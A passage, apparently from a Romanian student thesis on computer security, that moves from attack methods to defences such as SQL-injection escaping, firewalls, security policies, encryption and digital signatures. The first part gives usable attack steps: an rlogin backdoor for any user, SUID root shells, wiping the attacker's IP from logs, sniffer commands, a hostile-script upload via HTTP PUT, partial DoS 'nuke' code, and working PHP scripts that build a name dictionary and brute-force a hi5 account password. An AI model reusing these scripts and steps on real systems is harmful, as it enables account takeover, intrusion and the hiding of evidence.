Asta înseamnă că orice utilizator de pe site-ul mysite.com se poate conecta folosind comanda „rlogin” și userul „anyuser”. În Windows NT trebuie adăugat un cont în fișierul *.sam folosind aplicația „net”. Evident acest truc este detectabil de administratorul rețelei dar temporar este bun pentru că se obține acces root. Sub Unix se poate rula un script care conferă drept de root (SuID shell). Apoi după ce s-au obținut toate parolele și informațiile dorite se îndepărtează orice urmă a atacului pentru ca administratorul să nu observe. Urmele se șterg îndepărtând IP-ul folosit din fișierele „*.log”. Fișierul etc/inetd.conf conține toate serviciile care rulează pe server precum și setările acestora. O adevărată mană cerească pentru cine știe să le manipuleze.

O alta metodă cunoscută de a obține accesul pe un server este metoda „sniffingului”, ascultatul în rețea și capturarea și studierea pachetelor trimise și necriptate. Un sniffer este un program care monitorizează traficul pe rețea și ascultă pe un anume port indicat de atacator. Când cineva vrea să se conecteze la serverul de mail pentru a citi mesajele, parola și userul sunt interceptate și trimise la persoana care are snifferul în funcțiune. Un astfel de sniffer este Buttsniff.

Utilizarea improprie a acestui program poate duce la încălcarea legislației în vigoare.

c:/>buttsniff -l 0 fisier.dmp p fisier.foo

Să analizăm această comandă: fisier.dmp este fișierul care va conține datele capturate de sniffer. Fișierul fisier.foo conține comenzi sau mai bine zis instrucțiuni. Conținutul aproximativ al unui fisier.foo:

––––––––-*.*.*.*122.1.1.4+25––––––––

Asta înseamnă că este monitorizat serverul 122.1.1.4 pe portul 25 iar celelalte porturi sunt excluse.

Un fisier.foo gol înseamnă că se dorește colectarea tuturor datelor care vin / pleacă de la server.

O alta vulnerabilitate exploatată este comanda PUT. Aceasta funcționează dacă serverul este configurat prost:

c:/>windows/telnet server.com 80 PUT /scripts/script_ostil.asp HTTP/1.0 –corpul scriptului

–/n/n/n

Acest cod se execută din browser: www.server.com/script/script_ostil.asp.

Portul poate să nu fie 80 ci 8080 sau 8000, depinde de setări.

O altă metodă este folosirea unui program nuke (o variantă veche a atacului DoS) care întrerupe conexiunea la Internet. Ideea este că daemonul (serviciul) care rulează pe un anumit port nu poate face față la cereri repetate. Programul este scris în Borland C++, dar un programator îl poate transforma ușor într-un script Java sau se poate transforma cu un convertor.

#include <conio.h>

#include <stdio.h>

#include <winsock.h>struct {

int port; char *targetIP;

int NumOfAttact, BufSize;

} parm;

void Pause(void) {

cprintf ("Apasati orice tasta pentru a renunta…");

getch();

cprintf ("rn");

}

int CheckWinsock()

{

WORD wVersionRequested; WSADATA wsaData;

int err;

wVersionRequested = MAKEWORD(1, 1);

err = WSAStartup(wVersionRequested, &wsaData);

if (err != 0) return err;

if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE( wsaData.wVersion) != 1 )

{ WSACleanup();

return -1;

} return 0;

} ……………

2.4 Exemplu de atac brute force

Una din erorile multor utilizatori este folosirea prenumelor pe post de parolă. O astfel de parolă se poate foarte ușor afla folosind metoda „brute force” [web12]. Această metodă testează asupra țintei o listă generată de valori până găsește răspunsul. În funcție de lista de valori generată, se pot testa combinații de nume și numere.

Exemplu de script care adună de pe o pagină de net nume proprii:

<?

$link="http://www.util21.ro/invatamant/nume-copii/nume-baietei-incepand-cu-";

//$link="http://www.util21.ro/invatamant/nume-copii/nume-fetite-incepand-cu-";

$fisier="";

for ($i=0;

$i<26; $i++)

{ $page=$link.chr($i+97).".htm";

$text=file_get_contents($page);

$nume=explode('<span class="numecopii">',$text);

for($j=0; $j<count($nume);

$j++)

{ $temp=explode("</span>",$nume[$j+1]); $fisier.=$temp[0]."<br>";

} }

$fisier=strtolower (ereg_replace(':','',$fisier));

$fisier=ereg_replace(';','',$fisier);

$fisier=ereg_replace('/','<br>',$fisier);

$fisier=ereg_replace('<br><br>','<br>',$fisier);

echo

$fisier;

$fisier=ereg_replace('<br>','\r\n',$fisier);

file_put_contents("dictionar.txt",$fisier);

?>

Ce face scriptul: pagina respectivă accesată este o pagină dintr-un site pentru alegerea de nume pentru copii. Scriptul adună aceste nume și le scrie în fișierul dictionar.txt. Astfel, avem o listă de valori pentru a încerca un brute force simplu. Se pot folosi pentru recoltatul numelor diverse site-uri, mai ales cele care afișează liste lungi de nume și prenume (instituții școlare, de exemplu. Această metodă s-a folosit asupra site-urilor aparținând unor licee și facultăți în perioada când exista o ofertă specială pentru tinerii studenți oferită de serviciile de telefonie mobilă.Aceste servicii puteau fi accesate doar pe baza de CNP).

Acum să presupunem că vrem să accesăm un cont de hi5. Creăm un cont fantomă pentru a vedea adresa folosită pentru autentificare. Odată găsită, vom putea utiliza adresa printr-un script php.

<?

$victim="[anonimizat]";

// se înlocuiește cu victima

$words=file_get_contents("dictionar.txt");

$words=explode("\r\n",$words);

for ($i=0;

$i<count($words);

$i++)

{

$page=file_get_contents("http://m.hi5.com/friend/mobile/login/processLogin. do?email=".$victim."&password=".$words[$i])

// echo $words[$i]."<br>".$page;

if(stristr($page, 'Error') === FALSE) echo "Parola lui ".$victim." este ".$words[$i];

} ?>

Dacă serverul nu este protejat împotriva atacurilor brute force (de exemplu folosind un cod captcha sau blocarea respectivului ip / suspendarea contului după un anumit număr de încercări nereușite) vom avea acces la respectivul cont. Folosind metodologia de mai sus se poate crea un script care să poată fi folosit pentru testarea brute force a unor conturi de utilizatori și pe alte site-uri.

2.5 Niveluri de atac

Atacurile informatice sunt clasificate la rândul lor și în funcție de nivelul de periculozitate al acestora în caz de reușită. Nivelurile de atac pot fi clasificate în șase mari categorii:

nivelul 1: atac prin bombe e-mail și atac de refuz al serviciului;

nivelul 2: atac prin care utilizatorii locali obțin acces neautorizat pentru citire;

nivelul 3: atac prin care utilizatorii locali obțin acces neautorizat pentru scriere în fișiere în care nu au dreptul; utilizatorii de la distanță pot să deschidă sesiuni de lucru neautorizate (login);

nivelul 4: utilizatorii de la distanță pot avea acces la fișiere privilegiate (care conțin conturi și parole);

nivelul 5: utilizatorii de la distanță pot scrie în fișiere privilegiate reușind astfel să creeze conturi;

nivelul 6: utilizatorii de la distanță au drepturi de administrator (root) asupra sistemului.

Atacurile de nivel 1, deși sunt cele mai dese atacuri, sunt și cele mai lipsite de pericol. Acestea constau, în principal, din atacuri DoS și bombardare cu mesaje e-mail. Dacă atacul este de tip Synflood (descris anterior la punctul 2.4), se pot lua măsuri de stopare a acestuia folosind tehnologii firewall. O parte din programele care sunt folosite au la bază instrucțiuni PING care poartă cu ele și adresa IP a calculatorului care a lansat-o. În acest fel, identitatea atacatorului este dezvăluită. Această variantă este utilă doar în cazul unor rețele interne sau dacă atacatorul este slab pregătit și nu folosește un proxy. Pentru aflarea identității atacatorului se mai poate folosi comanda traceroute pentru a putea vedea adresa de unde vine atacul. Deși au un grad redus de risc, nu trebuie totuși ignorate. Ele pot duce la paralizarea traficului din rețea și pot chiar stopa funcționarea anumitor terminale.

Atacurile de nivel 2 și nivel 3 sunt efectuate de către utilizatori locali care obțin acces de citire și scriere în fișiere și directoare unde nu au acces. Nivelul 2 poate fi atins de utilizatorul local când acesta are acces la fișiere sau directoare. Dacă reușește să-și creeze drepturi și de scriere atunci atinge nivelul 3. Aceste situații apar cu precădere la sistemele de operare UNIX, Linux, Windows dar poate fi prevenit prin programe suplimentare de control al accesului (liste ACL). Chiar și la sistemele de operare unde accesul este controlat pot să apară probleme cauzate de configurările greșite din partea administratorului de sistem sau de vulnerabilitățile interne ale programelor utilizate.

Atacurile de nivel 4 sunt executate de persoane din exteriorul firmei care au acces la informația din interiorul firmei. Acești utilizatori pot să citească atât existența unor fișiere, cât și să citească conținutul acestora. În acest fel atacatorul va putea avea acces limitat la anumite informații de pe serverul sau serverele firmei, chiar dacă nu are conturi valide. Acest lucru este posibil din cauza configurării greșite, a unor programe CGI slab concepute sau a unor probleme de suprasolicitare (buffer overflow).

Atacurile de nivel 5 și nivel 6 sunt cele mai grave, uneori aceste atacuri devenind fatale. Aceste atacuri sunt posibile doar dacă nu au fost luate măsuri pentru stoparea atacurilor de niveluri inferioare sau din erori de programare.

Răspunsurile la atacurile de nivel 1 sunt relativ simple și ușor de implementat. Bombardarea e-mail poate fi ușor contracarată prin configurarea de filtre de exclusivitate care fac ca atacurile să fie fără succes. Atacurile DoS vor putea fi contracarate prin blocarea traficului acestuia (blocarea pachetelor de informații provenind de la IP-ul atacatorului). Răspunsurile la atacurile de nivel 2 se pot rezolva prin acoperirea golurilor de securitate în sistemele de operare și prin configurarea optimă a sistemului. De asemenea, se pot lua măsuri administrative împotriva celor care își depășesc atribuțiile.

Răspunsurile la atacurile care depășesc nivelul 2 sunt mult mai complexe și trebuie tratate cu foarte mare atenție. Dacă celelalte atacuri sunt opera unor începători în domeniu, acestea sunt executate de programatori specialiști și pot avea consecințe grave.

În cazul unor astfel de atacuri trebuie luate măsuri precum restrângerea ariei de desfășurare a atacului prin izolarea porțiunii de rețea supusă atacului, urmărirea evoluției atacului, înregistrarea evidențelor referitoare la atac, identificarea sursei atacului și, evident, identificarea utilizatorului.

2.6 Mijloace de prevenire ale atacurilor informatice

Pentru a asigura securitatea necesară a unui sistem informatic se pot adopta o serie de măsuri, unele relativ simple altele destul de complicate și care solicită eforturi financiare și intelectuale. În funcție de gradul de securitate dorit și de importanța sistemului informatic măsurile de prevenire a atacurilor informatice pot lua forma unor simple setări de protejare împotriva atacurilor DDos și DoS sau împotriva atacurilor tip SQL Injection în cazul unor sisteme informatice de importanță scăzută sau care nu necesită o protecție excesivă (datele conținute nefiind foarte importante). Aceste măsuri se aplică doar în cazuri izolate și singulare sau pentru efectuarea de teste. În cazul companiilor problema este mult mai atent tratată și este implementată printr-o serie de măsuri specifice, cuprinzând politici și modele de securitate precum și tehnologii și mecanisme de securitate. În continuare voi prezenta câteva metode de prevenire a atacurilor informatice (tip DDoS și SQL Injection, acestea fiind cele mai des întâlnite) urmând să descriu în continuare diverse mecanisme care se pot implementa într-un sistem informatic pentru a asigura securitatea informațiilor.

2.6.1 Cum ne putem proteja împotriva atacurilor Distributed Denial Of Service

Protecția împotriva unor atacuri DDoS se realizează folosind un firewall, switch-uri sau servere fantomă.

Prevenirea atacurilor informatice folosind tehnologii Firewall

În rețelele de calculatoare, un firewall (numit paravan de protecție sau parafoc) este un dispozitiv sau o serie de dispozitive configurate în așa fel încât să filtreze, să cripteze sau să intermedieze traficul între diferite domenii de securitate pe baza unor reguli predefinite. Aceste dispozitive pot fi și aplicații software tip firewall. Un firewall bun și bine configurat poate ajuta enorm în respingerea traficului nedorit, însă în același timp poate oferi și rezultate eronate, așa numitele „fals pozitive”. El poate să monitorizeze căile de pătrundere în rețeaua privată, permițând în felul acesta o monitorizare mai bună a traficului și deci o detectare mai

ușoară a încercărilor de infiltrare, poate să blocheze la un moment dat traficul spre și dinspre Internet, poate selecta accesul în spațiul privat pe baza informațiilor conținute în pachetele de date, să permită sau interzică accesul la rețeaua publică de pe anumite stații de lucru specificate și, la fel de important, poate izola spațiul privat de cel public, realizând interfața între cele două. Pe de altă parte, o aplicație de protecție firewall nu poate interzice importul / exportul de informații dăunătoare vehiculate ca urmare a acțiunii răutăcioase a unor utilizatori aparținând spațiului privat (ex: căsuța poștală și atașamentele), nu poate interzice scurgerea de informații pe alte căi care ocolesc paravanul de protecție (acces prin dial-up ce nu trece prin router), nu poate apăra rețeaua privată de utilizatorii ce folosesc sisteme fizice mobile de introducere a datelor în rețea (dispozitiv USB, dischetă, CD, etc.), nu poate preveni manifestarea erorilor de proiectare ale aplicațiilor ce realizează diverse servicii, precum și punctele slabe ce decurg din exploatarea acestor greșeli. De aceea, pentru o protecție maximă împotriva pericolelor din Internet, pe lângă un paravan de protecție mai este nevoie și de alte componente de pază.

Prevenirea atacurilor informatice folosind Switch-uri

Un switch (numit și comutator de rețea) este un dispozitiv care conectează mai multe segmente de rețele folosind diverse protocoale. În general denumirea se referă la o punte rețelistică cu mai multe porturi care procesează și ghidează informațiile la nivelul 2 „data link” al modelului OSI. Aceste dispozitive pot fi setate pentru a "întârzia" primirea pachetelor. Acest lucru poate fi folosit împotriva atacurilor de tipul TCP SynFlood. Switch-urile cu management (care se pot configura) se folosesc de obicei în rețele de dimensiuni medii sau mari și prezintă un preț și o calitate mai ridicate. Sarcina de configurare necesită de obicei cunoașterea nivelului 2 al rețelelor (data link în standardul OSI). Dintre caracteristicile care se pot configura merită amintite: setarea pornit / oprit a unor porturi, vitezei de legătură și setări duplex, setări de prioritate pentru porturi, filtrarea pachetelor în funcție de adresa MAC, folosirea protocolului Spanning Tree, monitorizarea de către SNMP (Simple Network Management Protocol) a dispozitivului și a conexiunii, oglindirea porturilor (mirroring, monitoring, spanning), agregarea conexiunilor (bonding,trunking) și setările VLAN (Virtual LocalArea Network).

Prevenirea atacurilor informatice folosind servere fantomă – este tehnica folosită pentru majoritatea serverelor companiilor mari precum Google, Yahoo! sau Microsoft.

Aceasta constă în redirecționarea traficului în servere de pe întreg globul în scopul scăderii traficului folosind tehnologia cloud.

2.6.2 Cum ne putem proteja împotriva SQL Injection

Pentru a evita o posibilă exploatare a vulnerabilității SQL Injection este necesară prelucrare tuturor datele ce parvin de la utilizatori la următoarele simboluri:

ghilimelele, atât simple cât și duble (‘, “, `). Cu ajutorul acestora în majoritatea cazurilor se efectuează injectarea codului SQL;

simbolurile de comentarii specifice unui anumit SGBD (/*,–). Cu ajutorul acestora poate fi omisă o parte din interogare;

simbolurile ce împart instrucțiunile SQL. Prezenta acestor simboluri permit de a forma mai multe cereri la baza de date;

în cazul când în cererea SQL se utilizează date numerice primite de la utilizatori, înainte de a le plasa în cererea SQLacestea ar trebui aduse la tipul numeric: $id=(int)$id;

în cazul când în cererea SQL se utilizează date de tip șir de caractere primite de la utilizatori, înainte de a le plasa în cererea SQL, acestea ar trebui prelucrate la simboluri speciale. Cea mai bună practică este formarea expresiilor regulate.

Trebuie de menționat că vulnerabilitățile de tipul SQL Injection sunt foarte răspândite. Aceste vulnerabilități vor permite atacatorului să afle / extragă informații despre server, să obțină un interpretator de comenzi sau chiar să realizeze un atac DoS.

Pentru a evita prezența acestei vulnerabilități este nevoie de o atentă tratare a simbolurilor speciale pentru absolut toate datele ce parvin de la utilizatori. În această categorie intră parametrii GET, POST și chiar cookie.

Niciodată nu trebuie omisă validarea informațiilor trimise de utilizatori prin formulare înainte de efectuarea interogării. De regulă, aceasta se face prin „pattern matching”. În exemplul următor, username-ul este restricționat la caractere alfanumerice plus underscore și cu o lungime cuprinsă între 8-20 caractere. Este eliminată astfel posibilitatea folosirii apostrofului pentru schimbarea interogării.

if (preg_match("/^w{8,20}$/", $_GET['username'], $matches))

$result = mysql_query("SELECT * FROM users WHERE username=$matches[0]"); else

echo "Username neacceptat";

Pentru o siguranță mai mare, este recomandată folosirea scriptului înlocuind echo cu

exit() sau die().

Să presupunem că erorile ce apar în cazurile cererilor la baza de date nu se afișează. Atunci atacatorului îi rămâne posibilitatea de a determina prezenta vulnerabilității după comportamentul aplicației web. Cu o mare probabilitate se poate spune că parametrul este vulnerabil când serverul returnează erorile 302 (page redirect) și 500 (internal server error). În acest caz atacatorul va utiliza unele tehnici mai avansate. Pentru a le înțelege este nevoie de a cunoaște tipurile de bază de date SQL. Atributele în SQL pot avea unul din cele 3 tipuri de baza: numeric, șir de caractere sau date. Fiecare tip are caracteristicile sale specifice care pot ajuta atacatorul în procesul de exploatare a vulnerabilității. În SQL parametrii numerici se transmit așa cum sunt, iar șirurile de caractere și valorile dată sunt transmise între ghilimele (unele SGBD permit și transmiterea valorilor numerice între ghilimele):

SELECT * FROM users WHERE id=5 /* valoare numerica */

SELECT * FROM users WHERE name='admin' /* valoare sir de caractere*/ Testarea la SQL Injection a parametrilor numerici este foarte simplă.

Voi folosi un exemplu cu 2 cazuri posibile: http://127.0.0.1/login.php?id=5' http://127.0.0.1/login.php?id=6-1 http://127.0.0.1/login.php?id=4+1

Daca parametrul id este vulnerabil în primul caz va fi generată o eroare SQL (sau o excepție: error 302, 500 – când erorile SGBD nu se afișează) deoarece cererea SELECT * FROM users WHERE id=5' nu este corectă din punct de vedere sintactic.

Cererile SELECT * FROM users WHERE id=6-1 și SELECT * FROM users WHERE id=4+1 se vor executa corect și vor da ambele același rezultat (vor extrage elementul din baza de date cu valoarea variabilei id=5), indicând că parametrul numeric id este vulnerabil.

O tehnică similară se folosește la testarea parametrilor șir caractere cu excepția unor diferențe: valorile parametrilor se transmit între ghilimele și concatenarea șirurilor de caractere în diferite SGBD este realizată diferit.

Procedura de testare a parametrului nume: http://127.0.0.1/inj.php?nume=lma0

are de asemenea 2 cazuri posibile.

În primul caz parametrului i se transmite o valoare care să genereze o eroare SQL: http://127.0.0.1/inj.php?name=lm'a0

Cererea SQLce va genera eroarea:

/* 1 */ SELECT * FROM users WHERE name='lm'a0' deoarece este prezent un simbol ' în plus

În al doilea caz parametrului i se transmite o valoare ce ar indica vulnerabilitatea acestuia:

http://127.0.0.1/inj.php?name=l'+'ma0

http://127.0.0.1/inj.php?name=lm'+'a0

Ca rezultat vor fi formate următoarele cereri la baza de date: SELECT * FROM users WHERE name='l'+'ma0'

SELECT * FROM users WHERE name='lm'+'a0'

Ambele cereri SQL sunt corecte și returnează același rezultat, evidențiind vulnerabilitatea și creând astfel posibilitatea reparării codului problemă.

PHP oferă o funcție care se ocupă cu inserarea userului în MySQL, aceasta fiind mysql_real_escape_string(string unescaped_string[, resource link_identifier])

Acest script scapă de toate caracterele potențial periculoase din șir (\x00, \n, \r, \, ', ", \x1a) și transforma șirul într-unul propice pentru a fi folosit in interogarea MySQL.

Un astfel de cod protejat folosind mysql_real_escape_string ar putea arăta ca în exemplul următor:

<?php

function check_input($value) {

// Stripslashes

if (get_magic_quotes_gpc()) {

$value = stripslashes($value); }

// Quote if not a number if (!is_numeric($value))

{

$value = "'" . mysql_real_escape_string($value) . "'"; }

return $value; }

$con = mysql_connect("localhost", "peter", "abc123"); if (!$con)

{

die('Could not connect: ' . mysql_error()); }

// Make a safe SQL

$user = check_input($_POST['user']); $pwd = check_input($_POST['pwd']); $sql = "SELECT * FROM users WHERE user=$user AND password=$pwd"; mysql_query($sql); mysql_close($con);

?>

Recomand și tratarea cookie-urilor pentru prevenirea inject-urilor în acestea:

<?php

foreach ($_COOKIE as $key => $value) {

if(get_magic_quotes_gpc())

$_COOKIE[$key]=stripslashes($value);

$_COOKIE[$key] = mysql_real_escape_string($value); }

?>

2.7 Politici de securitate

Modul facil de stocare a unor cantități imense de informație pe dispozitive de dimensiuni reduse accentuează riscul la care acestea sunt expuse. O mare parte a responsabilităților de securitate au fost transferate la nivelul utilizatorilor. Responsabilitatea nu este însă conștientizată la nivel real de către mulți utilizatori și sunt multe exemple în acest sens. Oamenii au înclinația să protejeze cu atenție documentele în format tipărit însă neglijează gradul de securitate pe care trebuie să-l asigure documentelor în format electronic. Pentru a evita neplăcerile unor incidente de securitate, companiile trebuie să dezvolte planuri de securitate.

Un plan de securitate este un document care descrie modul în care organizația va aborda problemele de securitate. Planul trebuie reanalizat și îmbunătățit periodic deoarece nevoile de securitate ale organizației se schimbă în permanență.

Planul de securitate identifică și organizează activitățile pentru asigurarea securității informației. El trebuie să se refere la următoarele aspecte: politica de securitate, starea curentă, cerințele de securitate, mecanismele de control, înregistrarea evenimentelor, planificarea operațiilor și îmbunătățirea permanentă.

Politica de securitate cuprinde un set de măsuri care prevede reguli clare, dar flexibile, pentru determinarea operațiilor și tehnologiilor standard necesare asigurării securității.

O politică de securitate reprezintă un document care punctează cerințele principale sau regulile care trebuie cunoscute și aplicate pentru asigurarea securității. Ea va conține cerințele de securitate dintr-o organizație și va descrie pașii care trebuie parcurși pentru asigurarea securității, va conține precizarea scopurilor și a intențiilor. La o primă vedere toate politicile de securitate sunt similare având ca obiectiv prevenirea breșelor de securitate. În realitate elaborarea unei politici de securitate este un proces dificil care presupune adaptarea la specificul organizației. Politica trebuie să răspundă fără echivoc la următoarele întrebări: Cine poate avea acces? La ce resurse de sistem și organizaționale va fi permis accesul? Ce tip de acces va primi fiecare utilizator pentru fiecare resursă?

Prin politica de securitate se urmărește protejarea următoarelor elemente:

memoriile active;

fișierele sau datele care sunt stocate pe suport extern;

programele din memorie;

structura de directoare;

anumite dispozitive electronice;

structurile de date;

sistemul de operare;

numele utilizatorilor și parolele.

Politicile de securitate eficiente fac referiri frecvente la standarde și îndrumare care trebuie să se găsească la nivelul fiecărei structuri organizaționale (economice, educaționale etc). Modelele de securitate sunt importante prin determinarea politicii de securitate a organizației la nivelul sistemului informațional. Studierea modelelor abstracte de securitate poate fi determinantă în înțelegerea mecanismelor de securitate care trebuie aplicate în anumite cazuri concrete. Un model de securitate descrie un mecanism logic care implementează o anumită politică de securitate deja stabilită.

Principalele caracteristici ale unui model de securitate sunt: modelul este precis și fără ambiguități;

este ușor de înțeles și de implementat;

se focalizează numai asupra problemelor de securitate și nu restricționează funcțiile sistemului.

2.8 Modele de securitate

Elementele esențiale dintr-un model de securitate informațională sunt resursele și utilizatorii (numiți adeseori și subiecte). Resursele sunt nominalizate, în literatura de specialitate, generic prin obiecte. În această categorie sunt cuprinse compilatoarele, editoarele de legături, bibliotecile de module și programe, bazele de date, resursele de documentație etc. Peste resurse și utilizatori, privite ca mulțimi, sunt definite relații. Modelele de securitate descriu un anumit set de relații între utilizatori și resurse.

Cele mai cunoscute sunt modelele Monitor, Graham-Denning, Bell La-Padula, Harrison-Ruzo-Ullman, Biba, Clark-Wilson, Lattice, Zidul Chinezesc.

2.9 Tehnologii și mecanisme de securitate

„Pentru multă vreme tehnologiile de securitate a informației au fost văzute ca un factor negativ, creând valoarea prin non-eveniment. Astăzi, ca rezultat al rețelelor globale și al extinderii firmelor dincolo de hotare apar ca facilitator de oportunități, ca un creator de valoare, în particular prin inducerea încrederii în cei implicați” (The IT Governance Institute,2001).

„Pentru a asigura securitatea informațiilor care sunt critice, fiecare companie trebuie să dezvolte o politică de securitate informatică care să asigure că atunci când ceva se întâmplă procesele care să rezolve situația există. Acesta este un proces fără sfârșit – un proces pentru dezvoltarea unei politici de securitate informatică este ca un cerc, care se întoarce întotdeauna la punctul de plecare pentru a mări siguranța: noi tehnologii și idei solicită o actualizare continuă a politicii de securitate informatică” [10].

Dintre tehnologiile și mecanismele de securitate utilizate pentru prevenirea atacurilor informatice și protejarea sistemelor informatice voi prezenta criptarea, semnătura digitală, protocolul Kerberos și produsul PGP. Desigur, acestea sunt doar câteva din soluțiile existente, gama acestora fiind destul de diversificată în funcție de gradul de securitate dorit, de nivelul de cunoștințe a responsabililor cu securitatea informației și, nu în ultimul rând, de investiția financiară în aceste soluții:

Tabel 1. Soluții de protejare a informației în sistemele informatice[2]

2.10 Criptarea

Criptarea are rolul de a transforma datele astfel încât să devină inteligibile numai de către entitatea autorizată (care, în general, deține o cheie secretă pentru a le descifra). În general, criptarea este folosită pentru a furniza confidențialitate, dar ea poate fi utilizată și pentru asigurarea altor servicii de securitate. Dezvoltarea societății informaționale, care a dus la o creștere impresionantă a volumului de informație preponderent economică vehiculată în rețelele de calculatoare, a accelerat dezvoltarea și mai ales utilizarea instrumentelor criptografiei moderne. Rolul criptografiei moderne este de a asigura prin mijloace matematice specifice, atât în teorie cât și în practică, cele patru caracteristici fundamentale ale informației: confidențialitatea, integritatea, autenticitatea și non-repudierea.

Criptografia modernă utilizează în principiu aceeași algoritmi ca și criptografia tradițională (transpoziția și substituția), dar accentul cade pe complexitatea algoritmilor. Obiectivul este de a concepe algoritmi de criptare atât de complecși și de ireversibili încât chiar și în situația în care atacatorul (sau criptanalistul) având la dispoziție cantități mari de text criptat la alegerea sa, să nu poată face nimic fără cheia secretă de criptare.

În criptografia modernă un sistem criptografic (criptosistem) este definit ca o structură cu cinci componente[10]:

P = { t / t T* } care este spațiul textelor în clar, scrise pentru un alfabet nevid T (în mod obișnuit T={0,1})

K spațiul cheilor de criptare, k K

Familia funcțiilor de criptare dependentă de chei și de un algoritm de criptare E Ek : P C , Ek = {ek / ek(t)=w și ek este injectivă}

Familia funcțiilor de decriptare dependentă de chei și de un algoritm de decriptare D Dk : C P , Dk = { dk / dk(ek( t )) = t t P }

C spațiul mesajelor cu text criptat unde: C={ w / k K, a P, w = Ek(a) }

Pentru ca un sistem criptografic să fie “bun” (principiile au fost enunțate încă din secolul XVII de Francisc Bacon) el trebuie să îndeplinească următoarele condiții:

fiind date ek și a

fiind date dk și w

P să fie ușor de calculat ek(a).

C să fie ușor de determinat dk (w).

să fie imposibil de determinat t din w, fără a cunoaște dk.

textul criptat să fie un text banal fără suspiciuni.

2.11 Mecanismul de semnătură digitală

Mecanismul de semnătură digitală are scopul de a da siguranța că datele au fost produse chiar de către semnatar. Pentru acest mecanism sunt definite două proceduri: procedura de semnare a datelor și procedura pentru verificarea semnăturii.

O semnătură digitală este reprezentată într-un calculator ca un șir de cifre binare. Aceasta este calculată cu ajutorul unui set de reguli și un set de parametri, astfel încât

identitatea semnatarului și integritatea datelor să poată fi verificată. Semnătura digitală este

implementată folosind o tehnică de criptare bazată pe o pereche unică asociată de chei unde o cheie este utilizată pentru a crea o semnătură (cheia privată), iar cealaltă pentru a verifica semnătura (cheia publică).

Fiecare utilizator are o pereche de chei publică și privată. Cheile publice sunt presupuse a fi cunoscute de public în general. Cheile private nu sunt niciodată partajate. Oricine poate verifica semnătura unui utilizator prin folosirea cheii publice a utilizatorului, în timp ce crearea semnăturii poate fi efectuată numai de către posesorul cheii private a utilizatorului. Conexiunea dintre cheia privată și cheia publică se realizează astfel încât să fie imposibilă din punct de vedere al calculului obținerea cheii de semnătură de la cheia de verificare. Infrastructura Cheii Publice (PKI) facilitează managementul și distribuția cheii.

Semnătura digitală poate fi clasificată în principal ca folosind trei algoritmi în ceea ce privește generarea și verificarea: DSA (bazat pe logaritmi discreți), RSA (bazat pe algoritmul de criptare RSA) și ECDSA(bazat pe algoritmul în curbă eliptică ).

Algoritmul semnăturii digitale (DSA)

A fost propus de Schnorr și El Gamal. Algoritmul este bazat pe logaritmi discreți pentru crearea și verificarea semnăturii. O funcție hash (Algoritm Hash Securizat, SHA-1) este folosită în procesul de generare a semnăturii pentru a obține o versiune condensată de date, așa-numitul extras al mesajului. Extrasul mesajului este apoi introdus în DSA pentru a genera semnătura digitală. Semnătura digitală este trimisă la verificatorul destinat împreună cu datele semnate. Verificatorului mesajului și al semnăturii verifică semnătura prin utilizarea cheii publice a expeditorului. În DSA, crearea semnăturii este mai rapidă decât verificarea semnăturii.

Pentru a exista o legătură între identitatea unui utilizator și cheia publică a utilizatorului este necesar un mijloc de a asocia perechi de chei publice și private cu utilizatorii corespunzători. Acest caracter obligatoriu poate fi certificat de către o parte de încredere reciprocă. Astfel, o terță parte de încredere este implicată pentru a rezolva problema litigiilor. De exemplu, o autoritate de certificare ar putea semna scrisorile de acreditare care conțin cheia publică și identitatea unui utilizator pentru a forma un certificat.

Algoritmul semnăturii digitale RSA

Securitatea acestui algoritm de semnătură (RSA este numit de la inventatorii săi Rivest, Shamir și Adleman) se bazează pe dificultatea de a factoriza numerele mari prime. Există un număr N cunoscut public, care este produsul a două numere prime, ale căror valori sunt secrete. Aceste numere prime sunt foarte importante pentru că oricine le știe valorile le poate folosi pentru a calcula cheia privată din cheia publică.Cu toate acestea, crearea semnăturii și procesul de verificare cuprinde și proceduri identice ca la DSA.

Utilizând o semnătură digitală RSA, verificarea unei semnături este mult mai rapidă decât semnarea. Acest lucru este de dorit pentru că un mesaj va fi semnat de către o persoană o singură dată, dar semnătura poate fi verificată de mai multe ori.

Algoritmul semnăturii electronice în curbă eliptică (ECDSA)

Sistemele de criptare în curbă eliptică au fost propuse pentru prima dată de Victor Miller și Köblitz Neal la mijlocul anilor 1980. Principalul punct de atracție al sistemelor de criptare în curbe eliptice față de alte sisteme de criptare a cheilor publice este faptul că securitatea semnăturii digitale în curbă eliptică se bazează pe probleme matematice grele: având în vedere două puncte G și Y pe o curbă eliptică, astfel încât Y = kG (adică, Y este G adăugat la sine de k ori), aflați numărul întreg k. Această problemă este denumită în mod obișnuit ca „problema logaritmului discret în curbă eliptică”.

Sistemele de criptare în curbă eliptică au apărut ca un domeniu promițător în criptografia cheii publice în ultimii ani datorită potențialului lor de a oferi securitate similară sistemelor de criptare cu chei publice deja stabilite cu dimensiuni reduse ale cheii. Ele sunt utile mai ales în aplicațiile pentru care memoria, lățimea de bandă, sau puterea de calcul este limitată. Sistemele de criptare în curbă eliptică, cu o cheie 160 biți oferă aceeași securitate ca sistemul RSA și logaritmul bazat pe sisteme discrete, cu o cheie de 1024 biți. Ca rezultat, lungimea cheii publice și private este mult mai scurtă în sistemele de criptare în curbă eliptică.

Procesul de semnare și verificare poate fi descris ca o înșiruire de etape astfel:

Deținerea perechii de cheie privată și publică. La începutul tranzacției sau în timpul tranzacției, participanții trebuie să achiziționeze unul de la celălalt cheia publică, în timp ce cheia privată a fiecărei părți trebuie să rămână secretă.

Generarea extrasului de mesaj. Expeditorul utilizează o funcție hash, care este un algoritm unidirecțional, pentru a transforma un mesaj într-o valoare de lungime fixă. Această valoare de lungime fixă este cunoscută ca extras de mesaj.

Semnarea mesajului. Expeditorul utilizează cheia sa privată pentru a cripta extrasul mesajului care face o semnătură a mesajului.Această semnătură este apoi adăugată la mesaj.

Mesaj expediat. Mesajul semnat digital este trimis "în text clar" la destinatar, deoarece orice modificare adusă conținutului mesajului va duce la o nepotrivire cu valoarea hash primită.

Verificarea mesajului. Destinatarul va genera o valoare hash din mesajul primit cu aceeași funcție hash unidirecțională. Extrasul criptat al mesajului poate fi decriptat cu cheia

publică a expeditorului. Apoi, aceste două valori hash vor fi comparate. Dacă cele două valori se potrivesc înseamnă că mesajul este veritabil și autentic; în cazul în care cele două valori nu se potrivesc, acest lucru indică posibila modificarea mesajului sau o eroare de transmisie.

